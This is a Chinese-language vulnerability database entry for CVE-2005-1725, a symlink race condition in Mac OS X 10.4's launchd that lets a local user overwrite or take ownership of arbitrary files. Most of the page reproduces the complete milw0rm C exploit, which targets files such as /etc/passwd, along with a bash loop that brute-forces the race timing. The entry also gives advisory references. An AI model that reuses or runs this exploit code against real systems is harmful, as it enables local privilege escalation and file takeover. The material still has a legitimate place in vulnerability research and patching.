Apple Mac OS X ‘launchd 106’ 安全漏洞-安全小百科

Apple Mac OS X ‘launchd 106’ 安全漏洞

漏洞ID	1108860	漏洞类型
发布时间	2005-06-14	更新时间	2005-10-20
CVE编号	CVE-2005-1725	CNNVD-ID	CNNVD-200506-047
漏洞平台	OSX	CVSS评分	2.1

|漏洞来源

https://www.exploit-db.com/exploits/1043
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200506-047

|漏洞详情

AppleMacOSX10.4.x到10.4.1版本中的launchd106存在安全漏洞，本地用户可通过对不安全临时文件夹里的套接字文件发起symlink攻击，从而覆盖任意文件。

|漏洞EXP

/*
 *  Mac OS X 10.4 launchd race condition exploit
 *
 *  intropy (intropy <at> caughq.org)
 */

/* .sh script to help with the offsets /str0ke
#!/bin/bash

X=1000
Y=3000
I=1

while ((1))
do
    ./CAU-launchd /etc/passwd $X
    if [ $I -lt 30 ]
    then
        ((X=$X+$Y))
        ((I=$I+1))
    else
        X=1000
        I=1
    fi
done
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>

#define DEBUG 0
#define SLEEP 6000

main(int argc, char *argv[])
{
    pid_t pid;
    int count, sleep = SLEEP;
    char name[100];    
    char target[100];
    struct stat *stats = (struct stat *)malloc(sizeof(struct stat));

    if ( argc < 2) {
        fprintf(stderr, "%s <file to 0wn>n", argv[0]);
        exit(-1);
    } else if ( argc > 2 ) {
        sleep = atoi(argv[2]);
        strncpy(target, argv[1], sizeof(target)-1);
    } else {
        strncpy(target, argv[1], sizeof(target)-1);
    }

    if ( DEBUG ) printf("Going for %sn", target);
    if ( DEBUG ) printf("Using usleep %dn", sleep);

    pid = fork();

    if ( pid == 0 ) {
        if ( DEBUG ) {
            system("/sbin/launchd -v /bin/ls -R /var/launchd/ 2>/dev/null");
        } else {
            system("/sbin/launchd -v /bin/ls -R /var/launchd/ >/dev/null 2>&1");
        }
    } else {
        snprintf(name, sizeof(name)-1, "/var/launchd/%d.%d/sock", getuid(), pid+2);
        if ( DEBUG ) printf("Checking %sn", name);
        usleep(sleep);
        if ( DEBUG ) printf("Removing sock...n");
        if ( (unlink(name)) != 0 ) {
            if ( DEBUG ) perror("unlink");
        } else {
            if ( (symlink(target, name)) != 0 ) {
                if ( DEBUG ) perror("symlink");
            } else {
                if ( DEBUG ) printf("Created symlink %s -> %s...n", name, target);
            }
        }
        stat(target, stats);
        if ( stats->st_uid == getuid() ) {
            printf("Looks like we got itn");
            usleep(10000000);
        }
    }
}

// milw0rm.com [2005-06-14]

|参考资料

来源:APPLE
名称:APPLE-SA-2005-06-08
链接:http://lists.apple.com/archives/security-announce/2005/Jun/msg00000.html
来源:MISC
链接:http://www.suresec.org/advisories/adv3.pdf
来源:BUGTRAQ
名称:20050608[SuresecAdvisories]-MacOSX10.4-launchdlocalrootvulnerability
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=111833509424379&w;=2

相关推荐: e107 Website System 0.6 – Nested BBCode URL Tag Script Injection

e107 Website System 0.6 – Nested BBCode URL Tag Script Injection 漏洞ID 1055259 漏洞类型发布时间 2005-07-18 更新时间 2005-07-18 CVE编号 N/A CNNVD…

文章版权归作者所有，未经允许请勿转载。

THE END